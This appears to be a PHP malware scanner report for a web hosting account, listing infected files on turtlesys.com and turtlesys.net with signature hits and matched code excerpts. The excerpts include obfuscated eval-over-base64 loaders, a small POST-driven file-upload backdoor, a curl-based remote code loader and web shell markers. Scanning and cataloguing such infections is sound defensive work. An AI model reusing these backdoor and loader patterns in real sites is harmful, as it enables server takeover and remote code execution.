Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php c3Rhd`
Sign ae7830db Dangerous Malware Signature (hash: ae7830db)	`<?php yZXBsYWNl`
Sign bced5841 Dangerous Malware Signature (hash: bced5841)	`<?php 8P3Boc`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZnVuY3Rpb2`
Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign de12c454 Dangerous Malware Signature (hash: de12c454)	`<?php VjaG`
Sign de12c454 Line: 1 Dangerous Malware Signature (hash: de12c454)	`<?php V2YW`
Sign e6546205 Dangerous Malware Signature (hash: e6546205)	`<?php kX1JFUVVFU1`

/custdata02/turtle/public_html/turtlesys.com/StmVPF4W3E6.php

Size: 43.44 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NVCh`
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/zsiyq4vMHTl.php

Size: 51.36 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/remUL13kiT4.php

Size: 43.48 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/turtlesys.com/xty8kfZaHV2.php

Size: 166.77 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/turtlesys.com/5rQHZLpwovi.php

Size: 51.81 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/OafmhWKdt2z.php

Size: 38.68 kB Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/turtlesys.com/theme-insifmq.php

Size: 338.00 B Created: 2024-06-04 19:34:41 Modified: 2024-06-04 19:34:41 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/W6UCFcpG1Yx.php

Size: 43.51 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/turtlesys.com/HbIQCKgOwNt.php

Size: 166.77 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/turtlesys.com/8fXp7N6R4bt.php

Size: 51.33 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.com/jmcDXT7QPoW.php

Size: 38.68 kB Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/turtlesys.com/theme-inseftj.php

Size: 338.00 B Created: 2024-06-04 19:51:12 Modified: 2024-06-04 19:51:12 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesys.net/index.php

Size: 13.95 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 08:12:22 Dangers: 6

Description	Match
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`

/custdata02/turtle/public_html/webadmin.turtlesys.net/cgi-bin/wp/iPNLvdg.php

Size: 1.29 kB Created: 2024-06-01 06:19:57 Modified: 2024-06-01 08:12:22 Warns: 1 Dangers: 2

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval('?>' . $a); exit(); function get_url_content($url) { if (function_exists('curl_exec')) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); if (isset($_SESSION['coki'])) { curl_setopt($conn, CURLOPT_COOKIE, $_SESSION['coki'])...

Sign 11413268 Line: 9 Dangerous

Malware Signature (hash: 11413268)

<?php eval('?>

Sign a915f4c2 Line: 8 Dangerous

Malware Signature (hash: a915f4c2)

<?php uggc://

/custdata02/turtle/public_html/webadmin.turtlesys.net/ShoMEFP1ypJ.php

Size: 43.44 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKHN2CjspKSk4LSAsbjBrMCwnAACnIv/IEUI...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($DiNjf($zrfJC($PcQnr($kNdXC('R6P3Wyqb/zcto/Lz/wYWtUpOVjDdZtgdtueFIjC80bd41qx0wKq25aD2ok/TCk3mdh3pduQtn+gJ+5uQKfnkxcPny2zdw8GvFn2kMMlvdKP5oyC40fZDX9m72DTn2UZJejRg1LS9YZ6q7aX4IEuTx3+qVYRci6OCF3D1PNY+1tbTru1VKqx05U0UYlkisoq52WWlvqT8xV0qxloYNZT6RrqzymqJMqWnMzNPAIyUDxBR4SPoQZFQ7HvkXezlEAGQkCV0j7hZgElZLBcA4i30jCjaXx+hGaRSHnIRkk77B0CUUR/VG/gziA72NJOc9znuTc0h9gggiRaR+3ff+jCwzpdJdZu2lEpQdYQxkQyc4KDzEcx+cSLFIeQ+K/0UMMNLXVG1ZmtydSQoYXZvMmtydSBhYnZncGFoc3spKV0wW12jxFtGWU5PQllUJChmZ2Z2a3JfYWJ2Z3BhaHMhKH...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php NVCh`
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/webadmin.turtlesys.net/bUKoaD1HgTE.php

Size: 51.36 kB Created: 2024-06-01 02:25:29 Modified: 2024-06-01 08:12:22 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($WBZyL($AlFWd($WQIKf('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/webadmin.turtlesys.net/WjfKqzZm6v3.php

Size: 43.48 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/webadmin.turtlesys.net/v6mt4LHPGyI.php

Size: 166.77 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/webadmin.turtlesys.net/IZn76zcpwgQ.php

Size: 51.81 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
